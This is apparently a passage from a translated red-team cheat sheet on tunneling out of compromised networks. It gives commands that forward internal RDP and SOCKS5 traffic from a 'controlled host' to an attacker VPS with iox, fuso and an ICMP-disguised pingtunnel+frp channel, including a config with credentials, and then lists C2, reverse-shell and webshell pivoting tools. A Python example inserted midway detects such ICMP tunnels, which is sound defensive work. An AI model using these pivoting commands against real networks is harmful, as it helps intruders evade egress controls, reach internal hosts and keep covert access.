Then use the local SOCKS5 proxy: socks5://vps:1081
fwd
Forward local port 3389 to the VPS:
Run on the VPS:
nohup ./iox fwd -l *8888 -l 33890 -k 22222
Run on the target machine:
iox.exe fwd -r 192.168.0.1:3389 -r *VPSIP:8888 -k 22222
Then connect to VPS:33890 to reach port 3389 on the internal host
fuso
GitHub: https://github.com/editso/fuso
socks
VPS:
./fus
// Controlled host
./fuc.exe VPSIP 6722 --socks
- linux: i686-unknown-linux-musl.zip
- windows: x86_64-pc-windows-msvc.zip
readme
1. Port forwarding
fuc --forward-host xxx.xxx.xxx.xxx --forward-port
--forward-host: address to forward to
--forward-port: port to forward to
Example: forward traffic to the internal host 10.10.10.4:3389
> fuc --forward-host 10.10.10.4 --forward-port 3389
2. socks5:
fuc --socks --su --s5p xxx --s5u xxx
--su: optional, enables UDP forwarding
--s5p: optional, authentication password; no password authentication by default
--s5u: optional, authentication username; default account anonymous
--socks: optional, enables the SOCKS5 proxy; UDP is not forwarded unless --su is given
Example: enable UDP forwarding and password authentication
> fuc --socks --su --s5p 123 --s5u socks
UDP forwarding is now enabled; the connection password is "123" and the username is "socks"
3. Specify the port exposed once the tunnel is established
fuc -b xxxx
-b | --visit-bind-port: optional, randomly assigned by default
Example: external port 8888 forwarded to internal port 80
> fuc --forward-port 80 -b 8888
4. Bridge mode (note: UDP cannot currently be forwarded)
fuc --bridge-listen xxxx --bridge-port xxx
--bridge-listen | --bl: listen address, default 127.0.0.1
--bridge-port | --bp: listen port; bridging is disabled by default
Example: start bridge mode listening on port 9999; this host's IP is 10.10.10.2
> fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # start the bridge
> fuc 10.10.10.2 9999 # connect through it
Cascading:
> fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # first hop, IP: 10.10.10.2
> fuc --bridge-listen 0.0.0.0 --bridge-port 9991 10.10.10.2 9999 # second hop, IP: 10.10.10.3
> fuc 10.10.10.3 9991 # final client
5. Send connection events to Telegram or another service
fus --observer "program:[arguments]"
--observer: hook run when a connection is established or closed
Example: use a bash script to send connection info to Telegram
> fus --observer "/bin/bash:[telegram.sh]"
6. Specify the port used for client-server communication
fuc --channel-port 8888 ...
--channel-port: optional, client-server communication port, random by default
ICMP tunnel with pingtunnel + frp
pingtunnel download: https://oss.ywhack.com/%E4%BB%A3%E7%90%86%E9%9A%A7%E9%81%93/pingtunnel-2.6
Controlled host
nohup ./pingtunnel -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:10000 -sock5 -1 -noprint 1 -nolog 1 >p.log &
nohup ./frpc -c frpc.ini > fff.log &
pingtunnel flags: -l listens on local port 9999, -s is the VPS IP, -t is the VPS address and frp server port
Client frp configuration
[common]
server_addr = 127.0.0.1
server_port = 10000
token = PassW0Rd
[zhaoshangju_10078]
type = tcp
remote_port = 10015
plugin = socks5
plugin_user = thIsuserAS
plugin_passwd = Passweqwe0Rm
use_encryption = true
VPS
./pingtunnel -type server
./frps -c frps.ini
Point a local proxy at VPS port 10015 with the credentials above to use the ICMP tunnel.
Reference: https://www.cnblogs.com/cute-puli/p/15213394.html
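The setup above hides a SOCKS5/frp channel inside ICMP echo traffic, and that is also what gives it away: a normal ping sends a fixed-size payload (56 bytes on Linux, 32 on Windows) about once a second, while a tunnel carries large, variable and frequent packets to one peer. The following Python is an added example, not code from the page, pingtunnel or frp, that applies that heuristic to per-packet ICMP summaries of the kind a sensor or flow exporter produces; the packet records, addresses and thresholds are constructed assumptions for the demo.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class IcmpPacket:
    ts: float          # capture time in seconds
    src: str
    dst: str
    icmp_type: int     # 8 = echo request, 0 = echo reply
    payload_len: int   # bytes after the 8-byte ICMP header


# Thresholds are constructed for the demo; tune them against a baseline.
MAX_NORMAL_PAYLOAD = 128   # Linux ping sends 56 bytes, Windows 32
MAX_NORMAL_PPS = 5.0       # interactive ping is ~1 packet/second
MAX_NORMAL_SIZES = 3       # a ping session keeps one payload size

# Constructed traffic: a normal 5-second ping, a tunnel-like burst of large
# packets at 10/s to an external peer, and a single stray echo request.
SAMPLE_PACKETS = (
    [IcmpPacket(float(i), "10.0.0.7", "10.0.0.1", 8, 56) for i in range(5)]
    + [IcmpPacket(i * 0.1, "10.0.0.5", "203.0.113.10", 8, 1400 if i % 3 else 96)
       for i in range(20)]
    + [IcmpPacket(3.0, "10.0.0.9", "10.0.0.1", 8, 32)]
)


def summarize_flows(packets):
    """Group echo traffic by (src, dst) and compute rate and payload statistics."""
    flows = defaultdict(list)
    for p in packets:
        if p.icmp_type in (0, 8):
            flows[(p.src, p.dst)].append(p)
    summary = {}
    for key, pkts in flows.items():
        ts = sorted(p.ts for p in pkts)
        duration = ts[-1] - ts[0]
        # A single packet has no duration; treat its rate as zero rather than divide by it.
        rate = len(pkts) / duration if duration > 0 else 0.0
        summary[key] = {
            "count": len(pkts),
            "rate": rate,
            "max_payload": max(p.payload_len for p in pkts),
            "distinct_sizes": len({p.payload_len for p in pkts}),
        }
    return summary


def flag_icmp_flows(packets):
    """Return {(src, dst): [reason, ...]} for flows that look like a tunnel."""
    findings = {}
    for key, s in summarize_flows(packets).items():
        reasons = []
        if s["max_payload"] > MAX_NORMAL_PAYLOAD:
            reasons.append("large_payload")
        if s["distinct_sizes"] > MAX_NORMAL_SIZES:
            reasons.append("variable_payload")
        if s["rate"] > MAX_NORMAL_PPS:
            reasons.append("high_rate")
        if reasons:
            findings[key] = reasons
    return findings


if __name__ == "__main__":
    for (src, dst), reasons in flag_icmp_flows(SAMPLE_PACKETS).items():
        print(f"{src} -> {dst}: {', '.join(reasons)}")
```

Each direction is scored separately, so the VPS's echo replies show up as a second flagged flow on a real capture; that is useful, because a host that only receives oversized echo replies without sending them is itself a sign of a relay. The cheaper mitigation is policy rather than detection: egress rules that drop ICMP echo to the internet from server segments remove the channel entirely.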
FRP
- Place frps and frps.ini on the machine that has a public IP.
- Place frpc and frpc.ini on the machine inside the internal network.
- Client: frpc -c frpc.ini
- Server: frps -c frps.ini
GitHub: https://github.com/fatedier/frp
Proxy tool list
- [2021.03.07] – proxifier cross-platform proxy tool supporting multiple SOCKS protocols
- [2021.03.07] – frp high-performance reverse proxy focused on NAT traversal
- [2021.03.07] – nps lightweight, high-performance, feature-rich NAT traversal proxy server
- [2021.03.07] – iox port forwarding & intranet proxy tool
- [2021.03.07] – Stowaway multi-hop proxy tool for penetration testers
- [2021.03.07] – rathole secure, stable, high-performance NAT traversal tool written in Rust
- [2021.03.07] – rsocx high-performance SOCKS5 tool supporting bind and reverse modes
- [2021.03.07] – rakshasa cross-platform, stable, stealthy multi-hop proxy and NAT traversal tool written in Go
- [2021.03.07] – SwitchyOmega browser proxy extension
- [2021.03.07] – Neo-reGeorg improved version of reGeorg
- [2021.03.07] – dns2tcp tool that tunnels TCP data over the DNS protocol
- [2021.03.07] – dnscat2 DNS tunneling tool
- [2021.03.07] – ABPTTS SSL-encrypted HTTP tunneling tool
- [2021.03.07] – Termite intranet proxy and port forwarding tool
- [2021.03.07] – SSTap network-layer proxy tool that uses a virtual network adapter
- [2021.03.07] – ew tool for starting a SOCKS v5 proxy service (cross-platform)
- [2021.03.07] – n2n open-source peer-to-peer NAT traversal tool
- [2021.03.07] – Ecloud tool that transports TCP traffic over HTTP/1.1
- [2021.03.07] – icmpsh a simple reverse ICMP shell
- [2021.03.08] – ngrok forward/reverse proxy, NAT traversal, port forwarding
- [2021.03.08] – ssf cross-platform encrypted tunnel and port forwarding tool
- [2021.03.14] – proxychains command-line proxy tool
- [2021.03.14] – switcher multi-function port forwarding / port reuse tool
- [2021.03.22] – pingtunnel tool that disguises tcp/udp/socks5 traffic as ICMP for forwarding
- [2021.03.26] – chisel fast and stable tunneling tool
- [2021.03.29] – pystinger tool that forwards traffic through a webshell to reach out of networks without egress
- [2021.03.29] – pivotnacci tool for establishing SOCKS connections through an HTTP agent
- [2021.04.06] – lanproxy NAT traversal tool that exposes LAN PCs and servers to the public internet
- [2021.04.14] – Venom multi-hop proxy tool written in Go for penetration testers
- [2021.05.07] – goproxy lightweight, powerful, high-performance multi-protocol proxy tool
- [2021.05.07] – SCFProxy free proxy pool built on Tencent Cloud Serverless Cloud Functions
- [2021.06.21] – MOSN cloud-native proxy for the edge or a service mesh
- [2021.06.23] – C2ReverseProxy tool for reverse proxying and getting Cobalt Strike (cs) callbacks in environments without direct internet access
Post-exploitation tool list
f8x
An automated deployment tool for red/blue team environments, supporting multiple scenarios: pentesting, development, proxy environments, optional services, etc.
- Project: https://github.com/ffffffff0x/f8x
- Chinese documentation: https://github.com/ffffffff0x/f8x/blob/main/README.zh-cn.md
Supershell
Supershell C2 remote-control platform that obtains a fully interactive shell over a reverse SSH tunnel
Viper
Internet attack surface management & red team simulation platform
Sliver C2
Sliver C2 is an open-source cross-platform red team framework.
Impacket
Python toolkit for internal network penetration testing